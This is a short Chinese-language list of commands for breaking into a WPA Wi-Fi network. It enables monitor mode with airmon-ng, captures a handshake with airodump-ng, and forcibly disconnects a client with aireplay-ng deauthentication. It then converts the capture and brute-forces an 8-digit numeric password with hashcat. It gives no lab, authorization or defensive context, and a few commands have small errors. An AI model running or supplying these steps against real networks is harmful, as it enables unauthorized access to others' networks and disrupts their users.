(一)
sudo -i
(二)
Airmon-ng
(三)
Airmon-ng start wlan0mon
(四)
Airodump-ng wlan0mon
Ctrl+C停止扫描
(五)
Airodump-ng -c (信道) --bssid (BSSID) -w hach wlan0mon
(六)
aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon
(七)
用hashcat
这是kali自带的工具
先把cap文件转hc22000文件
最简单的就是在线转
https://hashcat.net/cap2hashcat
sudo su
hashcat -a 3 -m 22000 文件名.hc22000 -o result.txt ?d?d?d?d?d?d?d?d